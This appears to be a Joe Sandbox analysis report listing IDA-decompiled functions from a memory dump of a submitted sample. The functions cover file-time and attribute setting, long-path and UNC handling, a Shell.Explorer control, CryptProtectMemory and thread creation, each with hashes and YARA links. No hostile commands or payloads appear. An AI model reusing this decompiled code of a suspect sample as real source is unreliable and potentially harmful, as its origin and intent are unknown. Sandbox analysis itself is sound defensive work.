Instruction ID: 41dc916d210c951270d783a9b2b3afe5d201a175af38efee714ca2ce4aa270c1
Opcode Fuzzy Hash: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
Instruction Fuzzy Hash: 6151A071E0010AAFEF14EFA8C881AADB7F5FF49310F25816AE494A7701E7319E01CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0006772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138
timeCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0006772B(void* __ecx, void* __edx) {
				void* __esi;
				char _t54;
				signed int _t57;
				void* _t61;
				signed int _t62;
				signed int _t68;
				signed int _t85;
				void* _t90;
				void* _t99;
				void* _t101;
				intOrPtr* _t106;
				void* _t108;

				_t99 = __edx;
				E0007E28C(E00091DF0, _t108);
				E0007E360();
				_t106 =  *((intOrPtr*)(_t108 + 0xc));
				if( *_t106 == 0) {
					L3:
					_t101 = 0x802;
					E0006FE56(_t108 - 0x1014, _t106, 0x802);
					L4:
					_t81 =  *((intOrPtr*)(_t108 + 8));
					E0006792E(_t106,  *((intOrPtr*)(_t108 + 8)), _t108 - 0x4084, 0x800);
					_t113 =  *((short*)(_t108 - 0x4084)) - 0x3a;
					if( *((short*)(_t108 - 0x4084)) == 0x3a) {
						__eflags =  *((char*)(_t108 + 0x10));
						if(__eflags == 0) {
							E0006FE2E(__eflags, _t108 - 0x1014, _t108 - 0x4084, _t101);
							E000670BF(_t108 - 0x3084);
							_push(0);
							_t54 = E0006A4C6(_t108 - 0x3084, _t99, __eflags, _t106, _t108 - 0x3084);
							_t85 =  *(_t108 - 0x207c);
							 *((char*)(_t108 - 0xd)) = _t54;
							__eflags = _t85 & 0x00000001;
							if((_t85 & 0x00000001) != 0) {
								__eflags = _t85 & 0xfffffffe;
								E0006A444(_t106, _t85 & 0xfffffffe);
							}
							E00069619(_t108 - 0x203c);
							 *((intOrPtr*)(_t108 - 4)) = 1;
							_t57 = E00069ECF(_t108 - 0x203c, __eflags, _t108 - 0x1014, 0x11);
							__eflags = _t57;
							if(_t57 != 0) {
								_push(0);
								_push(_t108 - 0x203c);
								_push(0);
								_t68 = E00063B3D(_t81, _t99);
								__eflags = _t68;
								if(_t68 != 0) {
									E000696D0(_t108 - 0x203c);
								}
							}
							E00069619(_t108 - 0x50ac);
							__eflags =  *((char*)(_t108 - 0xd));
							 *((char*)(_t108 - 4)) = 2;
							if( *((char*)(_t108 - 0xd)) != 0) {
								_t62 = E000699B0(_t108 - 0x50ac, _t106, _t106, 5);
								__eflags = _t62;
								if(_t62 != 0) {
									SetFileTime( *(_t108 - 0x50a8), _t108 - 0x205c, _t108 - 0x2054, _t108 - 0x204c);
								}
							}
							E0006A444(_t106,  *(_t108 - 0x207c));
							E00069653(_t108 - 0x50ac, _t106);
							_t90 = _t108 - 0x203c;
						} else {
							E00069619(_t108 - 0x60d4);
							_push(1);
							_push(_t108 - 0x60d4);
							_push(0);
							 *((intOrPtr*)(_t108 - 4)) = 0;
							E00063B3D(_t81, _t99);
							_t90 = _t108 - 0x60d4;
						}
						_t61 = E00069653(_t90, _t106);
					} else {
						E00061F94(_t113, 0x53, _t81 + 0x24, _t106);
						_t61 = E00066FC6(0xa0f50, 3);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0xc));
					return _t61;
				}
				_t112 =  *((intOrPtr*)(_t106 + 2));
				if( *((intOrPtr*)(_t106 + 2)) != 0) {
					goto L3;
				} else {
					_t101 = 0x802;
					E0006FE56(_t108 - 0x1014, 0x93760, 0x802);
					E0006FE2E(_t112, _t108 - 0x1014, _t106, 0x802);
					goto L4;
				}
			}

0x0006772b
0x00067730
0x0006773a
0x00067741
0x0006774a
0x00067779
0x00067779
0x00067787
0x0006778c
0x0006778c
0x0006779c
0x000677a1
0x000677a9
0x000677c8
0x000677cc
0x00067809
0x00067814
0x00067821
0x00067824
0x00067829
0x0006782f
0x00067832
0x00067835
0x00067837
0x0006783c
0x0006783c
0x00067847
0x00067854
0x00067862
0x00067867
0x00067869
0x0006786b
0x00067874
0x00067875
0x00067876
0x0006787b
0x0006787d
0x00067885
0x00067885
0x0006787d
0x00067890
0x00067895
0x00067899
0x0006789d
0x000678a8
0x000678ad
0x000678af
0x000678cc
0x000678cc
0x000678af
0x000678d9
0x000678e4
0x000678e9
0x000677ce
0x000677d4
0x000677d9
0x000677e3
0x000677e4
0x000677e7
0x000677ea
0x000677ef
0x000677ef
0x000678ef
0x000677ab
0x000677b2
0x000677be
0x000677be
0x000678fa
0x00067904
0x00067904
0x0006774c
0x00067750
0x00000000
0x00067752
0x00067752
0x00067764
0x00067772
0x00000000
0x00067772

APIs

__EH_prolog.LIBCMT ref: 00067730
SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000678CC

Part of subcall function 0006A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0006A27A,?,?,?,0006A113,?,00000001,00000000,?,?), ref: 0006A458
Part of subcall function 0006A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0006A27A,?,?,?,0006A113,?,00000001,00000000,?,?), ref: 0006A489

Strings

:, xrefs: 000677A1

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: File$Attributes$H_prologTime
String ID: :
API String ID: 1861295151-336475711
Opcode ID: e88ce9636dfbfb1f2f054ee4f124dea7b5787108321b20b4c294b18b4402e805
Instruction ID: 0079c7b51e90c2ef87ea8ef6eb9c916aca26f71e43b1a912a8fd4d0730bb4e69
Opcode Fuzzy Hash: e88ce9636dfbfb1f2f054ee4f124dea7b5787108321b20b4c294b18b4402e805
Instruction Fuzzy Hash: 99417371905258AAEB24EB50DD49EEEB3BEEF45304F0040EAB609A3093DB745F84CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0006B66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0006B66C(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v4096;
				short _v4100;
				signed short* _t30;
				long _t32;
				short _t33;
				void* _t39;
				signed short* _t52;
				void* _t53;
				signed short* _t62;
				void* _t66;
				intOrPtr _t69;
				signed short* _t71;
				intOrPtr _t73;

				E0007E360();
				_t71 = _a4;
				if( *_t71 != 0) {
					E0006B806(_t71);
					_t66 = E000835B3(_t71);
					_t30 = E0006B832(_t71);
					__eflags = _t30;
					if(_t30 == 0) {
						_t32 = GetCurrentDirectoryW(0x7ff,  &_v4100);
						__eflags = _t32;
						if(_t32 == 0) {
							L22:
							_t33 = 0;
							__eflags = 0;
							L23:
							goto L24;
						}
						__eflags = _t32 - 0x7ff;
						if(_t32 > 0x7ff) {
							goto L22;
						}
						__eflags = E0006B90D( *_t71 & 0x0000ffff);
						if(__eflags == 0) {
							E0006B207(__eflags,  &_v4100, 0x800);
							_t39 = E000835B3( &_v4100);
							_t69 = _a12;
							__eflags = _t69 - _t39 + _t66 + 4;
							if(_t69 <= _t39 + _t66 + 4) {
								goto L22;
							}
							E0006FE56(_a8, L"\\\\?\\", _t69);
							E0006FE2E(__eflags, _a8,  &_v4100, _t69);
							__eflags =  *_t71 - 0x2e;
							if(__eflags == 0) {
								__eflags = E0006B90D(_t71[1] & 0x0000ffff);
								if(__eflags != 0) {
									_t71 =  &(_t71[2]);
									__eflags = _t71;
								}
							}
							L19:
							_push(_t69);
							L20:
							_push(_t71);
							L21:
							_push(_a8);
							E0006FE2E(__eflags);
							_t33 = 1;
							goto L23;
						}
						_t13 = _t66 + 6; // 0x6
						_t69 = _a12;
						__eflags = _t69 - _t13;
						if(_t69 <= _t13) {
							goto L22;
						}
						E0006FE56(_a8, L"\\\\?\\", _t69);
						_v4096 = 0;
						E0006FE2E(__eflags, _a8,  &_v4100, _t69);
						goto L19;
					}
					_t52 = E0006B806(_t71);
					__eflags = _t52;
					if(_t52 == 0) {
						_t53 = 0x5c;
						__eflags =  *_t71 - _t53;
						if( *_t71 != _t53) {
							goto L22;
						}
						_t62 =  &(_t71[1]);
						__eflags =  *_t62 - _t53;
						if( *_t62 != _t53) {
							goto L22;
						}
						_t73 = _a12;
						_t9 = _t66 + 6; // 0x6
						__eflags = _t73 - _t9;
						if(_t73 <= _t9) {
							goto L22;
						}
						E0006FE56(_a8, L"\\\\?\\", _t73);
						E0006FE2E(__eflags, _a8, L"UNC", _t73);
						_push(_t73);
						_push(_t62);
						goto L21;
					}
					_t2 = _t66 + 4; // 0x4
					__eflags = _a12 - _t2;
					if(_a12 <= _t2) {
						goto L22;
					}
					E0006FE56(_a8, L"\\\\?\\", _a12);
					_push(_a12);
					goto L20;
				} else {
					_t33 = 0;
					L24:
					return _t33;
				}
			}

0x0006b674
0x0006b67a
0x0006b681
0x0006b68d
0x0006b69a
0x0006b69c
0x0006b6a1
0x0006b6a3
0x0006b729
0x0006b72f
0x0006b731
0x0006b7f0
0x0006b7f0
0x0006b7f0
0x0006b7f2
0x00000000
0x0006b7f3
0x0006b737
0x0006b739
0x00000000
0x00000000
0x0006b748
0x0006b74a
0x0006b78f
0x0006b79b
0x0006b7a5
0x0006b7a9
0x0006b7ab
0x00000000
0x00000000
0x0006b7b6
0x0006b7c6
0x0006b7cb
0x0006b7cf
0x0006b7db
0x0006b7dd
0x0006b7df
0x0006b7df
0x0006b7df
0x0006b7dd
0x0006b7e2
0x0006b7e2
0x0006b7e3
0x0006b7e3
0x0006b7e4
0x0006b7e4
0x0006b7e7
0x0006b7ec
0x00000000
0x0006b7ec
0x0006b74c
0x0006b74f
0x0006b752
0x0006b754
0x00000000
0x00000000
0x0006b763
0x0006b76a
0x0006b77c
0x00000000
0x0006b77c
0x0006b6a6
0x0006b6ab
0x0006b6ad
0x0006b6d5
0x0006b6d6
0x0006b6d9
0x00000000
0x00000000
0x0006b6df
0x0006b6e2
0x0006b6e5
0x00000000
0x00000000
0x0006b6eb
0x0006b6ee
0x0006b6f1
0x0006b6f3
0x00000000
0x00000000
0x0006b702
0x0006b710
0x0006b715
0x0006b716
0x00000000
0x0006b716
0x0006b6af
0x0006b6b2
0x0006b6b5
0x00000000
0x00000000
0x0006b6c6
0x0006b6cb
0x00000000
0x0006b683
0x0006b683
0x0006b7f4
0x0006b7f8
0x0006b7f8

Strings

\\?\, xrefs: 0006B6BE, 0006B6FA, 0006B75B, 0006B7AE
UNC, xrefs: 0006B708

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID:
String ID: UNC$\\?\
API String ID: 0-253988292
Opcode ID: a2ba6e701c3482165c57005d362f68437d8c4c62137ac55b203e81e3872de804
Instruction ID: 8d14c3237f939c5ca6c460a4e42ddfb9064d5e9522c22213d7ed143a2201d969
Opcode Fuzzy Hash: a2ba6e701c3482165c57005d362f68437d8c4c62137ac55b203e81e3872de804
Instruction Fuzzy Hash: B341B2B544425ABACF20AF21DC41EFF7BAFAF81750B104066F854E7152EB71DAC0DA60

Uniqueness

Uniqueness Score: -1.00%

Function 00078FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00078FB6(void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v4;
				signed int* _v20;
				void* __ecx;
				void* __esi;
				intOrPtr _t21;
				char _t22;
				signed int* _t26;
				intOrPtr* _t28;
				intOrPtr _t30;
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				signed int* _t58;

				_t50 = __edi;
				_t34 = _t35;
				_t53 = _a4;
				 *((intOrPtr*)(_t34 + 4)) = _t53;
				_t21 = E0007E24A(__edx, _t53, __eflags, 0x30);
				_v4 = _t21;
				if(_t21 == 0) {
					_t22 = 0;
					__eflags = 0;
				} else {
					_t22 = E000787EE(_t21);
				}
				 *((intOrPtr*)(_t34 + 0xc)) = _t22;
				if(_t22 == 0) {
					return _t22;
				} else {
					 *((intOrPtr*)(_t22 + 0x18)) = _t53;
					E0007980F( *((intOrPtr*)(_t34 + 0xc)), L"Shell.Explorer");
					_push(1);
					E00079A6E();
					E00079A04( *((intOrPtr*)(_t34 + 0xc)), 1);
					_t26 = E00079901( *((intOrPtr*)(_t34 + 0xc)));
					_t58 = _t26;
					if(_t58 == 0) {
						L7:
						__eflags =  *((intOrPtr*)(_t34 + 0x10));
						if( *((intOrPtr*)(_t34 + 0x10)) != 0) {
							E00078A06(_t34);
							_t28 =  *((intOrPtr*)(_t34 + 0x10));
							__eflags =  *((intOrPtr*)(_t34 + 0x20));
							_push(0);
							 *((char*)(_t34 + 0x25)) = 0;
							_t54 =  *_t28;
							_push(0);
							_push(0);
							_push(0);
							if( *((intOrPtr*)(_t34 + 0x20)) == 0) {
								_push(L"about:blank");
							} else {
								_push( *((intOrPtr*)(_t34 + 0x20)));
							}
							 *0x93260(_t28);
							_t26 =  *((intOrPtr*)(_t54 + 0x2c))();
						}
						L12:
						return _t26;
					}
					_t10 = _t34 + 0x10; // 0x10
					_t30 = _t10;
					_v4 = _t30;
					 *0x93260(_t58, 0x9541c, _t30, _t50);
					_t32 =  *((intOrPtr*)( *( *_t58)))();
					 *0x93260(_t58);
					_t26 =  *((intOrPtr*)( *((intOrPtr*)( *_t58 + 8))))();
					if(_t32 >= 0) {
						goto L7;
					}
					_t26 = _v20;
					 *_t26 =  *_t26 & 0x00000000;
					goto L12;
				}
			}

0x00078fb6
0x00078fb8
0x00078fbb
0x00078fc1
0x00078fc4
0x00078fc9
0x00078fd0
0x00078fdb
0x00078fdb
0x00078fd2
0x00078fd4
0x00078fd4
0x00078fdd
0x00078fe2
0x00079095
0x00078fe8
0x00078fe9
0x00078ff4
0x00078ffc
0x00078ffe
0x00079008
0x00079010
0x00079015
0x00079019
0x0007905a
0x0007905a
0x0007905e
0x00079062
0x00079067
0x0007906c
0x0007906f
0x00079070
0x00079073
0x00079075
0x00079076
0x00079077
0x0007907b
0x00079082
0x0007907d
0x0007907d
0x0007907d
0x00079088
0x0007908e
0x0007908e
0x00079091
0x00000000
0x00079091
0x0007901e
0x0007901e
0x0007902d
0x00079031
0x00079037
0x00079044
0x0007904a
0x0007904f
0x00000000
0x00000000
0x00079051
0x00079055
0x00000000
0x00079055

APIs

new.LIBCMT ref: 00078FC4

Strings

Shell.Explorer, xrefs: 00078FEF
about:blank, xrefs: 00079082

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID:
String ID: Shell.Explorer$about:blank
API String ID: 0-874089819
Opcode ID: c7b1d3ad93dc47dc37d54877cd829b5b17f526f65eae6beeb8d941be10456a52
Instruction ID: 80d62161a1a6e65de87e042037f5a39ed152e0545a68c004eac13220f1112b1d
Opcode Fuzzy Hash: c7b1d3ad93dc47dc37d54877cd829b5b17f526f65eae6beeb8d941be10456a52
Instruction Fuzzy Hash: 43219171A143049FDB18DF68C895A6A77A8FF44311B14C46EF90D8F282DB78EC01CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0006EBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 0006EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0006EB92
Part of subcall function 0006EB73: GetProcAddress.KERNEL32(000A81C0,CryptUnprotectMemory), ref: 0006EBA2

GetCurrentProcessId.KERNEL32(?,?,?,0006EBEC), ref: 0006EC84

Strings

CryptProtectMemory failed, xrefs: 0006EC3B
CryptUnprotectMemory failed, xrefs: 0006EC7C

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 60cef9bb0457608ac9329d338c89791ec8a31df7ea2ecbf1e8b7d9874ddf60cc
Instruction ID: 4f53bb5f862bfcdf12131187a1fa918fb39502eae8fa8d32f331559b72d5391a
Opcode Fuzzy Hash: 60cef9bb0457608ac9329d338c89791ec8a31df7ea2ecbf1e8b7d9874ddf60cc
Instruction Fuzzy Hash: 7C113F35A047985FEB159B34DC06AAE375AEF01730B048115FC056B292DB796D4287D4

Uniqueness

Uniqueness Score: -1.00%

Function 00089B90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00089B90(signed int __ecx, void* __edx) {
				void* __esi;
				intOrPtr _t9;
				intOrPtr _t14;
				intOrPtr _t18;
				signed int _t21;
				signed int _t28;
				intOrPtr _t30;
				intOrPtr _t31;

				_t23 = __ecx;
				_t9 =  *0xc127c; // 0x200
				_t30 = 3;
				if(_t9 != 0) {
					__eflags = _t9 - _t30;
					if(_t9 < _t30) {
						_t9 = _t30;
						goto L4;
					}
				} else {
					_t9 = 0x200;
					L4:
					 *0xc127c = _t9;
				}
				 *0xc1280 = E000885A9(_t23, _t9, 4);
				E000884DE(0);
				if( *0xc1280 != 0) {
					L8:
					_t28 = 0;
					__eflags = 0;
					_t31 = 0x9e6b0;
					do {
						_t1 = _t31 + 0x20; // 0x9e6d0
						E0008A6CA(_t23, _t31, __eflags, _t1, 0xfa0, 0);
						_t14 =  *0xc1280; // 0x0
						 *((intOrPtr*)(_t14 + _t28 * 4)) = _t31;
						_t23 = (_t28 & 0x0000003f) * 0x30;
						_t18 =  *((intOrPtr*)( *((intOrPtr*)(0xc1298 + (_t28 >> 6) * 4)) + 0x18 + (_t28 & 0x0000003f) * 0x30));
						__eflags = _t18 - 0xffffffff;
						if(_t18 == 0xffffffff) {
							L12:
							 *((intOrPtr*)(_t31 + 0x10)) = 0xfffffffe;
						} else {
							__eflags = _t18 - 0xfffffffe;
							if(_t18 == 0xfffffffe) {
								goto L12;
							} else {
								__eflags = _t18;
								if(_t18 == 0) {
									goto L12;
								}
							}
						}
						_t31 = _t31 + 0x38;
						_t28 = _t28 + 1;
						__eflags = _t31 - 0x9e758;
					} while (__eflags != 0);
					__eflags = 0;
					return 0;
				} else {
					 *0xc127c = _t30;
					 *0xc1280 = E000885A9(_t23, _t30, 4);
					_t21 = E000884DE(0);
					if( *0xc1280 != 0) {
						goto L8;
					} else {
						return _t21 | 0xffffffff;
					}
				}
			}

0x00089b90
0x00089b90
0x00089b98
0x00089b9b
0x00089ba4
0x00089ba6
0x00089ba8
0x00000000
0x00089ba8
0x00089b9d
0x00089b9d
0x00089baa
0x00089baa
0x00089baa
0x00089bb9
0x00089bbe
0x00089bcd
0x00089bfa
0x00089bfb
0x00089bfb
0x00089bfd
0x00089c02
0x00089c09
0x00089c0d
0x00089c12
0x00089c1c
0x00089c24
0x00089c2e
0x00089c32
0x00089c35
0x00089c40
0x00089c40
0x00089c37
0x00089c37
0x00089c3a
0x00000000
0x00089c3c
0x00089c3c
0x00089c3e
0x00000000
0x00000000
0x00089c3e
0x00089c3a
0x00089c47
0x00089c4a
0x00089c4b
0x00089c4b
0x00089c54
0x00089c57
0x00089bcf
0x00089bd2
0x00089bdf
0x00089be4
0x00089bf3
0x00000000
0x00089bf5
0x00089bf9
0x00089bf9
0x00089bf3

APIs

_free.LIBCMT ref: 00089BBE
_free.LIBCMT ref: 00089BE4

Strings

X, xrefs: 00089C4B

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: _free
String ID: X
API String ID: 269201875-2800284421
Opcode ID: ec1304ff9c1a4c30bf0c519f833478e3d021b4587895ef8165ba72475691caea
Instruction ID: 13d3624fa3d85849fa84b9471909c67be0ea9797d99388d2f759a167e17e00b8
Opcode Fuzzy Hash: ec1304ff9c1a4c30bf0c519f833478e3d021b4587895ef8165ba72475691caea
Instruction Fuzzy Hash: 5811E676A016115BFB60BB38EC41FA673D4B752330F080226F5A1CB1D2E778C8518784

Uniqueness

Uniqueness Score: -1.00%

Function 00070889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
threadCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00070889() {
				long _v4;
				void* __ecx;
				void* __esi;
				void* __ebp;
				void* _t5;
				int _t8;
				void* _t12;
				void** _t18;
				void* _t22;

				_t12 = 0;
				if( *0xa0f50 > 0) {
					_t18 = 0xa0f54;
					do {
						_t22 = CreateThread(0, 0x10000, E000709D0, 0xa0f50, 0,  &_v4);
						if(_t22 == 0) {
							_push(L"CreateThread failed");
							_push(0xa0f50);
							E00066E8C(E0007F190(E00066E91(0xa0f50)), 0xa0f50, 0xa0f50, 2);
						}
						 *_t18 = _t22;
						 *0x000A1054 =  *((intOrPtr*)(0xa1054)) + 1;
						_t8 =  *0xa81d8; // 0x0
						if(_t8 != 0) {
							_t8 = SetThreadPriority( *_t18, _t8);
						}
						_t12 = _t12 + 1;
						_t18 =  &(_t18[1]);
					} while (_t12 <  *0xa0f50);
					return _t8;
				}
				return _t5;
			}

0x0007088e
0x00070892
0x00070896
0x00070899
0x000708b3
0x000708b7
0x000708b9
0x000708be
0x000708db
0x000708db
0x000708e0
0x000708e2
0x000708e8
0x000708ef
0x000708f4
0x000708f4
0x000708fa
0x000708fb
0x000708fe
0x00000000
0x00070903
0x00070907

APIs

CreateThread.KERNEL32(00000000,00010000,000709D0,?,00000000,00000000), ref: 000708AD
SetThreadPriority.KERNEL32(?,00000000), ref: 000708F4

Part of subcall function 00066E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00066EAF

Strings

CreateThread failed, xrefs: 000708B9

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 27a37571b901a3fe587f7f2cae4a84b8c76535aee141c58ff5330b998b904632
Instruction ID: 6aae55164fe37793394a6f1352bbc55feef2e2644df71c5b224fed45c4451a1f
Opcode Fuzzy Hash: 27a37571b901a3fe587f7f2cae4a84b8c76535aee141c58ff5330b998b904632
Instruction Fuzzy Hash: DC01F9B1744306AFE624AF54EC81FA67398EB41711F10423EF6CAA6181CEE5B8419668

Uniqueness

Uniqueness Score: -1.00%

Function 0008B2AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E0008B2AE(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				signed int _t15;
				intOrPtr _t20;
				void* _t24;
				signed int _t25;
				void* _t29;
				intOrPtr _t30;
				void* _t31;
				void* _t36;

				_t28 = __edx;
				_t24 = __ecx;
				_t23 = __ebx;
				E0007ED00(__edx, 0x9bc00, 0xc);
				_t30 = 0;
				 *((intOrPtr*)(_t31 - 0x1c)) = 0;
				_t29 = E00088FA5(__ebx, _t24, __edx);
				_t25 =  *0x9eda0; // 0xfffffffe
				if(( *(_t29 + 0x350) & _t25) == 0 ||  *((intOrPtr*)(_t29 + 0x4c)) == 0) {
					L5:
					_t15 = E0008A3F1(5);
					 *((intOrPtr*)(_t31 - 4)) = _t30;
					_t30 =  *((intOrPtr*)(_t29 + 0x48));
					 *((intOrPtr*)(_t31 - 0x1c)) = _t30;
					_t36 = _t30 -  *0x9ed40; // 0x3232130
					if(_t36 != 0) {
						if(_t30 != 0) {
							asm("lock xadd [esi], eax");
							if((_t15 | 0xffffffff) == 0 && _t30 != 0x9eb20) {
								E000884DE(_t30);
							}
						}
						_t20 =  *0x9ed40; // 0x3232130
						 *((intOrPtr*)(_t29 + 0x48)) = _t20;
						_t30 =  *0x9ed40; // 0x3232130
						 *((intOrPtr*)(_t31 - 0x1c)) = _t30;
						asm("lock inc dword [esi]");
					}
					 *((intOrPtr*)(_t31 - 4)) = 0xfffffffe;
					E0008B33F();
					goto L3;
				} else {
					_t30 =  *((intOrPtr*)(_t29 + 0x48));
					L3:
					if(_t30 != 0) {
						return E0007ED46(_t28);
					}
					E00088566(_t23, _t28, _t29, _t30);
					goto L5;
				}
			}

0x0008b2ae
0x0008b2ae
0x0008b2ae
0x0008b2b5
0x0008b2ba
0x0008b2bc
0x0008b2c4
0x0008b2c6
0x0008b2d2
0x0008b2e5
0x0008b2e7
0x0008b2ed
0x0008b2f0
0x0008b2f3
0x0008b2f6
0x0008b2fc
0x0008b300
0x0008b305
0x0008b309
0x0008b314
0x0008b319
0x0008b309
0x0008b31a
0x0008b31f
0x0008b322
0x0008b328
0x0008b32b
0x0008b32b
0x0008b32e
0x0008b335
0x00000000
0x0008b2d9
0x0008b2d9
0x0008b2dc
0x0008b2de
0x0008b34f
0x0008b34f
0x0008b2e0
0x00000000
0x0008b2e0

APIs

Part of subcall function 00088FA5: GetLastError.KERNEL32(?,000A0EE8,00083E14,000A0EE8,?,?,00083713,00000050,?,000A0EE8,00000200), ref: 00088FA9
Part of subcall function 00088FA5: _free.LIBCMT ref: 00088FDC
Part of subcall function 00088FA5: SetLastError.KERNEL32(00000000,?,000A0EE8,00000200), ref: 0008901D
Part of subcall function 00088FA5: _abort.LIBCMT ref: 00089023

_abort.LIBCMT ref: 0008B2E0
_free.LIBCMT ref: 0008B314

Strings

, xrefs: 0008B30B

Memory Dump Source

